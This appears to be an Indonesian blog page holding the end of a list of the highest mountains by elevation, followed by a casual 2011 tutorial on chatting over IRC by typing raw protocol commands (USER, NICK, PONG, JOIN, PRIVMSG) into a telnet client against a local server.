76. HuascarĂ¡n, pegunungan Andes, Peru, 22,205 ft / 6,768 m.
77. Llullaillaco, pegunungan Andes, Argentina/Chili, 22,057 ft / 6,723 m.
78. El Libertador, pegunungan Andes, Argentina, 22,047 ft / 6,720 m.
79. Cachi, pegunungan Andes, Argentina, 22,047 ft / 6,720 m.
80. Kailas, pegunungan Himalaya, Tibet, 22,027 ft / 6,714 m.
81. Incahuasi, pegunungan Andes, Argentina/Chili, 21,720 ft / 6,620 m.
82. Yerupaja, pegunungan Andes, Peru, 21,709 ft / 6,617 m.
83. Kurumda, pegunungan Pamir, Tajikistan, 21,686 ft / 6,610 m.
84. Galan, pegunungan Andes, Argentina, 21,654 ft / 6,600 m.
85. El Muerto, pegunungan Andes, Argentina/Chili, 21,463 ft / 6,542 m.
86. Sajama, pegunungan Andes, Bolivia, 21,391 ft / 6,520 m.
87. Nacimiento, pegunungan Andes, Argentina, 21,302 ft / 6,493 m.
88. Illampu, pegunungan Andes, Bolivia, 21,276 ft / 6,485 m.
89. Illimani, pegunungan Andes, Bolivia, 21,201 ft / 6,462 m.
90. Coropuna, pegunungan Andes, Peru, 21,083 ft / 6,426 m.
91. Laudo, pegunungan Andes, Argentina, 20,997 ft / 6,400 m.
92. Ancohuma, pegunungan Andes, Bolivia, 20,958 ft / 6,388 m.
93. Cuzco, pegunungan Andes, Peru, 20,945 ft / 6,384 m.
94. Ausangate (Toro), pegunungan Andes, Argentina/Chili, 20,932 ft / 6,380 m.
95. Tres Cruces, pegunungan Andes, Argentina/Chili, 20,853 ft / 6,356 m.
96. Huandoy, pegunungan Andes, Peru, 20,852 ft / 6,356 m.
97. Parinacota, pegunungan Andes, Bolivia/Chili, 20,768 ft / 6,330 m.
98. Tortolas, pegunungan Andes, Argentina/Chili, 20,745 ft / 6,323 m.
99. Chimborazo, pegunungan Andes, Ecuador, 20,702 ft / 6,310 m.
100. Ampato, pegunungan Andes, Peru, 20,702 ft 6,310 m.

Keterangan:

* ft = satuan panjang feet (kaki)
* m = satuan panjang meter

Sumber : Wiki Indonesia

Jumat, 28 Januari 2011

IRC MENGGUNAKAN TELNET CLIENT by Sandal

Waktu itu, saya sedang iseng di chanel #irchelp mencari tahu cara pembuatan script mIRC,
dan beberapa hal tentang IRC. Maklum, saya gak hobi ceting, paling cuma nongkrong doang.

Kebetulan saya mempunyai beberapa IRC client di rumah, yang saya jalankan pada localhost
menggunakan BIRCD (Beware IRC Daemon [Demit?]). Sehingga ntar saya bisa latihan tanpa harus
online. Soalnya, kompie di rumah gak bisa buat OL T_T

Lalu saya bertanya pada penghuni #irchelp (yang semuanya baik hati) tentang IRC client
yang imut yang mereka tahu. Lalu ada yang bertanya, "imut bagaimana maksudnya?"

Lalu saya jelaskan bahwa saya ingin IRC client yang ukurannya kecil.


you can use old version of mIRC. I have all.
um.. I mean, the client that I don't have to install
you can copy only the exe, the rest are yours :P
<@jaban> dal.net has the web version, you can use w/out any client


Jawaban mereka belum memuaskan keingintahuan saya. Iseng tiba-tiba terpikirkan kemungkinan
untuk cetting memakai telnet. Telnet yang saya maksud bukan melalui remote shell, tapi
menggunakan client telnet.

Lalu di warnet itu juga saya telnet ke DAL.net

C:\WINDOWS>telnet irc.dal.net 6667

Lalu muncul:

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response

Blah.... trus gimana nih? Saya tuliskan perintah-perintah IRC yang saya tahu. Saya coba
ketik perintah HELP, siapa tahu Daemonnya baik hati mau memberitahu apa yang harus di-
lakukan.

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
HELP
:irc.dal.net 451 HELP :Register first.

Gludak! Tambah bingung nih. Saya coba perintah REGISTER, siapa tahu berhasil.

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
HELP
:irc.dal.net 451 HELP :Register first.
register sandal passwordku sandal@bonbon.net

Gak muncul apa-apa. Gimana nih????
Dalam kekalutan hati, tiba-tiba saya teringat om Google yang baik hati.
JREEENG!!!! Saya menemukannya. Coba deh ke free2code.com (apa .net ya?).

Inilah yang harus dilakukan untuk cetting menggunakan telnet. Kali ini saya menggunakan
localhost, biar gak perlu online :P Jangan lupa server IRC-nya dihidupin dulu.

C:\WINDOWS>telnet 127.0.0.1 6667
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response

Kemudian masukkan data kita, dengan format:

USER [NAMA] [HOST] [HOST] [:NAMA ASELI]
user sandal localhost localhost :Tes Ajah

Pemakaian titik dua ":", hanya jika nama aseli lebih dari satu kata. Untuk host, baik
sedang online atau tidak, nama localhost tetep bisa dipakai kok. Saya sendiri belum
begitu mudeng tentang hal ini :D

Kok gak muncul apa-apa? Jangan khawatir, lanjut ke perintah berikutnya. Yaitu menentukan
nick yang akan dipakai.

NICK [YOURNICKNAME]
nick sandal

Jika berhasil, server akan nge-ping ke kita. Agar dianggep hidup, kita harus membalasnya
dengan pong.

PING :1100108772

Balas dengan:

PONG :1100108772 <-- angka sesuai yang muncul di ping.

Jika berhasil, maka akan muncul keterangan server tersebut, termasuk juga MOTD-nya
(Message Of The Day).

Berikut lengkapnya. Tanda [] saya gunakan untuk membedakan input dengan output.
Pada pemakaian sebenarnya, TIDAK menggunakan tanda tersebut. Jadi yang berada dalam "[]"
adalah apa yang harus kita tuliskan


C:\WINDOWS>telnet 127.0.0.1 6667
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
[user sandal localhost localhost :Namaku Sandal]
[nick sandal]
PING :615981036
[PONG :615981036]
:server.dian.sastro 001 sandal :Welcome to the Internet Relay Network sandal
:server.dian.sastro 002 sandal :Your host is server.dian.sastro, running version
beware1.5.7
:server.dian.sastro 003 sandal :This server was created Tue Jul 13 2004 at 20:36:07 GMT
:server.dian.sastro 004 sandal server.dian.sastro beware1.5.7 dgikoswx biklmnoprstv
:server.dian.sastro 005 sandal MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG
CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported
by this server
:server.dian.sastro 005 sandal NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#&
PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459
:are supported by this server
:server.dian.sastro 251 sandal :There are 1 users and 0 invisible on 1 servers
:server.dian.sastro 255 sandal :I have 1 clients and 0 servers
:server.dian.sastro NOTICE sandal :Highest connection count: 1 (1 clients)
:server.dian.sastro 422 sandal :MOTD File is missing
:server.dian.sastro NOTICE sandal :on 1 ca 1(4) ft 10(10)

Selanjutnya adalah menentukan channel yang akan kita gunakan. Perintah-perintah mIRC
pada umumnya bisa kita gunakan di sini. Bedanya adalah pada telnet, kita tidak menggunakan
tanda "/" (garis miring).

join #cinta
:sandal!~sandal@server.dian.sastro JOIN :#cinta
:server.dian.sastro 353 sandal = #cinta :@sandal
:server.dian.sastro 366 sandal #cinta :End of /NAMES list.

Tiba-tiba ada yang gabung dan menyapa kita.

:jeki!admin@server.dian.sastro JOIN :#cinta
:jeki!admin@server.dian.sastro PRIVMSG #cinta :hai sandal

Lalu kita balas. Format penulisan adalah: "PRIVMSG [#channel] [:isi pesan]".
Ingat, tanda ":" dipakai karena isi pesan lebih dari satu kata.

privmsg #cinta :hai juga jeki

Tiba-tiba di monitor muncul tulisan PING :server.dian.sastro, itu artinya server pengen
tau kita masih hidup apa enggak. Untuk itu harus dibales dengan PONG.

PING :server.dian.sastro
PONG :server.dian.sastro <-- sesuai yang muncul di PING

Pokoknya setiap muncul PING :******* kita harus membalasnya dengan PONG :*******.
Jika tidak, maka server akan menganggap kita udah mati dan memutuskan koneksi.

Bagaimana jika ingin melakukan query/pesan pribadi?
Hampir sama dengan mengirim pesan ke channel. Bedanya, nama channel diganti dengan nickname.

PRIVMSG jeki :apa kabar ente jek?

Well, itu saja yang bisa saya sampaikan, soale saya juga lom banyak tahu.
Silahkan dieksplorasi, agar lebih memahami.

Semoga bisa menambah pengetahuan teman-teman, dan bagi yang sudah menguasainya, mohon
pencerahan jika terdapat kesalahan dalam tulisan ini.